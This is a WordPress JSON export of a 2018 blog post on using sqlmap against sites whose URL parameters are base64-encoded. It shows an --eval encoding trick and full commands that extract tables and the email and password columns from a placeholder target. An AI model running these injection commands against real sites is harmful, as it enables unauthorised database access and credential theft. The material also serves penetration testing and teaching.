{"id":286,"date":"2018-07-07T22:51:48","date_gmt":"2018-07-07T22:51:48","guid":{"rendered":"http:\/\/malwrforensics.com\/en\/?p=286"},"modified":"2024-01-09T21:35:25","modified_gmt":"2024-01-09T21:35:25","slug":"sqlmap-advanced-tips-and-tricks","status":"publish","type":"post","link":"https:\/\/malwrforensics.com\/en\/2018\/07\/07\/sqlmap-advanced-tips-and-tricks\/","title":{"rendered":"sqlmap advanced tips and tricks"},"content":{"rendered":"

Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters.<\/p>\n

For example, we have something like:<\/p>\n

http:\/\/<target>\/products\/article.php?art_id=<base64_encoded_value><\/pre>\n
In this case we have to “convince” sqlmap that when scanning, to use base64 for all payloads. Well, I guess it’s a good thing that sqlmap has the following option which allows you to add your custom python code:<\/p>\n
--eval=EVALCODE\u00a0 \u00a0 \u00a0 \u00a0 Evaluate provided Python code before the request<\/pre>\n
In python, if you want to encode a string using base64, you need something like:<\/p>\n
import base64<\/pre>\n
print(base64.b64encode('MY_STRING'))<\/pre>\n
Tip: Would be useful to determine if you need a prefix as well (something like ‘ or “)<\/p>\n
Once you get the database name,<\/p>\n
In the end, the command will look something like this:<\/p>\n
sqlmap -u \"http:\/\/<target>\/products\/article.php?art_id=\" -p art_id --eval \"import base64; art_id = base64.b64encode(art_id)\" -v 3\u00a0--prefix=\"' \"<\/pre>\n
Once you got a list of tables and let’s say you only want to retrieve the columns from the my_users table, you can add the -D and -T parameters.<\/p>\n
sqlmap -u \"http:\/\/<target>\/products\/article.php?art_id=\" -p art_id --eval \"import base64; art_id = base64.b64encode(art_id)\" -v 3\u00a0--prefix=\"' \" -D my_db -T my_users<\/pre>\n
If you only want to focus on specific fields, you can use the -C option:<\/p>\n
sqlmap -u \"http:\/\/<target>\/products\/article.php?art_id=\" -p art_id --eval \"import base64; art_id = base64.b64encode(art_id)\" -v 3\u00a0--prefix=\"' \" -D my_db -T my_users -C my_email,my_password<\/pre>\n
Hope this helps!<\/p>\n","protected":false},"excerpt":{"rendered":"
Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters. For example, we have something like: http:\/\/<target>\/products\/article.php?art_id=<base64_encoded_value> In this case we have to “convince” sqlmap that when scanning, to use base64 for all payloads. Well, I guess it’s a good thing that sqlmap has the following option which allows […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[81,11,35,44,80],"class_list":["post-286","post","type-post","status-publish","format-standard","hentry","category-security","tag-base64","tag-linux","tag-python","tag-sql-injection","tag-sqlmap"],"blocksy_meta":{"styles_descriptor":{"styles":{"desktop":"","tablet":"","mobile":""},"google_fonts":[]}},"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"post_excerpt_stackable_v2":"
Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters. For example, we have something like: http:\/\/<target>\/products\/article.php?art_id=<base64_encoded_value> In this case we have to “convince” sqlmap that when scanning, to use base64 for all payloads. Well, I guess it’s a good thing that sqlmap has the following option which allows you to add your custom python code: –eval=EVALCODE\u00a0 \u00a0 \u00a0 \u00a0 Evaluate provided Python code before the request In python, if you want to encode a string using base64, you need something like: import base64 print(base64.b64encode(‘MY_STRING’)) Tip: Would be useful to determine if you need…<\/p>\n","category_list_v2":"Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments","_links":{"self":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/comments?post=286"}],"version-history":[{"count":4,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/286\/revisions"}],"predecessor-version":[{"id":828,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/286\/revisions\/828"}],"wp:attachment":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/media?parent=286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/categories?post=286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/tags?post=286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}